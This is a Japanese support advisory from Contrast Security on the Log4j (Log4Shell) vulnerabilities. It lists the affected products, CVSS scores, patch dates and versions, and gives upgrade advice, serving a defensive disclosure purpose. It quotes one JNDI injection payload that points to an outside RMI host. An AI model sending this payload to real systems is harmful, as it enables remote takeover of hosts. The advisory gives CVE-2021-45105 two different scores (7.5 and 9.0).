サポート速報:Contrast製品におけるLog4jゼロデイ脆弱性の影響

  • 更新

最初の投稿:2021年12月10日 (記事内は全て米国東部時間)

このページは頻繁に更新されます。最新の記事の更新については、タイトル下の日付/時間(GMT)をご覧ください。

弊社ではこの数週間、Log4jの問題を注意深く追い続けています。CVE-2021-44832関してですが、この特定の脆弱性は、弊社が使用していない非標準のLog4j 設定を利用するものです。そして、悪意のある第三者がLog4jの設定ファイルを変更するためにアクセス権が必要であり、そのためには権限昇格が必要となります。このリスクは非常に低いため、ASF(Apacheソフトウェア財団)の初期のCVSSスコアでは、6.6と判定されています。弊社の標準的な脆弱性管理プロセスでは、この格付けの脆弱性に対して30日間の修正期間を設けています。詳細はこちらを参照:CVSSスコア

 

何が起こったか?具体的な影響は?

Java用のオープンソースライブラリである「Log4J」ゼロディ脆弱性が、米国東部時間(EST)の2021年12月9日午前9時30分に公表され、現在CVE-2021-44228として公表されています。

この脆弱性は、Contrastをご利用の全てのお客様に影響します。Contrast SecurityのアプリケーションでSaaS版およびオンプレミス版(EOP)の両方において、この脆弱性のあるライブラリが使用されていることを確認しましたが、現時点で侵入された形跡などは無いことを確認済みです。

  • 2021年12月9日22時15分(EST)時点で、ContrastのSaaS版アプリケーションにLog4j 2.15を適用済み 
  • 2021年12月14日15時37分(EST)、全てのSaaS版アプリケーションにLog4j 2.16を適用
  • 2021年12月18日11時36分(EST)、全てのSaaS版アプリケーションにLog4j 2.17を適用
  • 2021年12月18日12時18分(EST)、Log4j 2.17を適用したEOP版をリリース

Log4j 2.17へのアップグレードにより、以下に対応しております:

CVE-2021-44228

CVE-2021-45046

CVE-2021-45105

オンプレミス版をご利用のお客様は、Contrastでは、Log4j 2.17を適用済みのバージョンをリリースしておりますので、全てのお客様がこのバージョンにアップグレードすることを推奨します。

注意:ここでは、Contrast Securityのソフトウェアの影響についてをお知らせしていますが、お客様のJavaアプリケーションも影響を受けている可能性が非常に高いです。速やかにアプリケーションに対してアップグレード/アップデートなど、対策を講じてください。ContrastのProtectは、公開されているPoC(実証コード)も含め、ほとんどの攻撃ベクトルに対してアプリケーションを保護することができます。

どのような脆弱性なのか?

CVE-2021-44228 - NVD(National Vulnerability Database)の情報はこちらをご覧ください。

なぜ問題なのか?

問題のライブラリは、多くのJavaアプリケーションで広く使用されています。弊社では、このCVEが非常に広範囲な影響を与え、大多数のJavaアプリケーションに影響があると考えています。

このライブラリが、Contrast Securityの製品でも使用されていることを確認しています(詳細は後述)。

脆弱な可能性は? 

Log4jを使用して、攻撃者が制御するあらゆる情報(HTTPヘッダ、URI、パラメータ、Cookieなど)を記録するアプリケーションは脆弱と言えます。攻略は非常に簡単で、簡単に自動化することができます。 例えば、1つのHTTPリクエストで${jndi:rmi://192.168.1.31:1099/9tmpja}”を送信するだけで、アプリケーションのホストを完全に制御できます。お客様のシステムがインターネット経由でアクセス可能な場合は、特にリスクが高くなります。自動化された攻撃が広範囲になる可能性があります。Contrast研究所では、悪用可能であることを明らかにしています。

今後も検証作業は継続し、進捗状況をお知らせします。

どのくらい深刻か? 

本件に関するCVEは、現時点ではNIST(米国国立標準技術研究所)が精査中ですが、NISTは最初のCVSSスコアを設定しています。しかし、ASF(Apacheソフトウェア財団)は、スコアの更新を続けています。 弊社内の専門家はASFのスコアに同意し、これらの更新を反映するために当社のCVEスコアを更新しました。

CVE-2021-44228 - CVSS 10.0

  • NVD(National Vulnerability Database)の情報はこちらを参照
  • ASF(Apacheソフトウェア財団)は、このCVEをCVSS10.0と判定(詳細はこちら)
  • バージョン2.15で修正

CVE-2021-45046 - CVSS 9.0

  • NVD(National Vulnerability Database)の情報はこちらを参照
  • ASF(Apacheソフトウェア財団)は、このCVEをCVSS9.0と判定(詳細はこちら)
  • バージョン2.16で修正

CVE-2021-45105 - CVSS 7.5

  • NVD(National Vulnerability Database)の情報はこちらを参照
  • ASF(Apacheソフトウェア財団)は、このCVEをCVSS9.0と判定(詳細はこちら)
  • バージョン2.17で修正

Contrast Securityにどう関連し、影響があるお客様は?   

ContrastのSaaS版をご利用のお客様は、この脆弱性が悪用されていた場合に影響があった可能性がありますが、今までのところ侵入の形跡は検出されていません。なお、弊社は全てのSaaS版システムにパッチを適用済みです。

ContrastのEOP版をご利用のお客様で、Web経由でシステムにアクセス可能な場合は、直ちにパッチを適用してください。パッチが適用されたEOPバージョンがリリースされていますので、全てのお客様が早急にアップグレードすることを推奨します。

Contrast Javaエージェントへの影響はありません。Contrast Security製品がJava 6、Java 7、JBossのような旧テクノロジやフレームワークを使用するアプリケーションをサポートするために、Javaエージェントは古いバージョンのlog 4 jを使用しています。 弊社では、Log4j 1.xの使用は許できるリスクであると判断しています。しかし、弊社ではLog4j 1.xに依存しないJavaエージェントの新しいバージョンをリリースすることを検討していますが、前述の旧フレームワークをサポートしない可能性があります。

製品

影響

防御

パッチ適用

SaaS版(ホスト型)の環境(全て)

あり

あり

Contrast Protectが有効

適用済み

  • 2021年12月9日22時15分 米国東部時間:バージョン20211210-0244.7cb22d5f24でパッチ適用
  • 2021年12月14日:Log4jをv2.16にした最新のバッチ適用版は20211214-1919.f9997ec34b
  • 2021年12月18日:Log4jをv2.17にした最新のパッチ適用版は20211218-1347.94611350e8
  • 2022年1月4日:Log4jを2.17.1にした最新のパッチ適用版は20220105-0044.b896b7f413

オンプレミス(EOP)版の環境

あり

なし

適用済み

  • 2021年12月10日:バージョン3.8.10.1566200307でLog4jを2.15にアップグレード済
  • 2021年12月16日:バージョン3.8.10.1589286247でLog4jを2.16にアップグレード済
  • 2021年12月18日:バージョン3.8.10.1596449597でLog4jを2.17にアップグレード済
  • 2022年1月11日:バージョン3.8.11.1683721903でLog4jを2.17.1にアップグレード済

Javaエージェント

なし

N/A

N/A

Contrast Scan

あり

あり

Contrast Protectが有効

適用済み

  • 2021年12月10日 15時35分米国東部時間:バージョン0.0.124でパッチ適用済
  • 2021年12月15日:ScanマイクロサービスをLogback 1.2.8に更新
  • 2021年12月15日:Scan エンジンのLog4jを2.16に更新
  • 2021年12月19日:ScanエンジンのLog4jを2.17に更新
  • 2022年1月5日:ScanエンジンのLog4jを2.17.1に更新

Contrastのお客様がこの脆弱性の有無を判断するには?

Contrast EOPサーバの全てのバージョンで3.8.10.1566200307より前のバージョンに、このゼロディの脆弱性があります。さらに、ASFの勧告に従って、3.8.10.1589286247をリリースし、Log4jのバージョン2.16に更新して、 CVE-2021-45046へ対する防御を追加しています。 追加リリースの3.8.10.1596449597では、Log4jのバージョン2.17に更新して、CVE-2021-45105へ対する防御を追加しています。

 

Contrastのお客様は何をすべきか?

オンプレミス版(EOP)をご利用のお客様は、Contrast HUB(こちら)より最新のパッチ適用済みバージョン(3.8.10.1596449597以降)にアップグレードすることを推奨します。標準的なアップグレード手順(こちら)に従ってください。

 

お客様のJavaアプリケーションのポートフォリオについては、アプリケーション内の脆弱なライブラリを検索し、早急にパッチを適用したライブラリに更新する必要があります。Contrast研究所では、Contrast Assessでこの脆弱性が脆弱なコードパスにおける「ログインジェクション」として識別されることも確認済みです。また、Contrast SCAは、この脆弱なライブラリを識別します。全ての脆弱なJavaアプリケーションに対して推奨される修正方法をブログで公開しています: https://www.contrastsecurity.com/security-influencers/0-day-detection-of-log4j2-vulnerability

 

何かご質問や不明な点がございましたら、support@contrastsecurity.comまでご連絡くださいますようお願いします。

 

関連記事:

この記事は役に立ちましたか?

0人中0人がこの記事が役に立ったと言っています

他にご質問がございましたら、リクエストを送信してください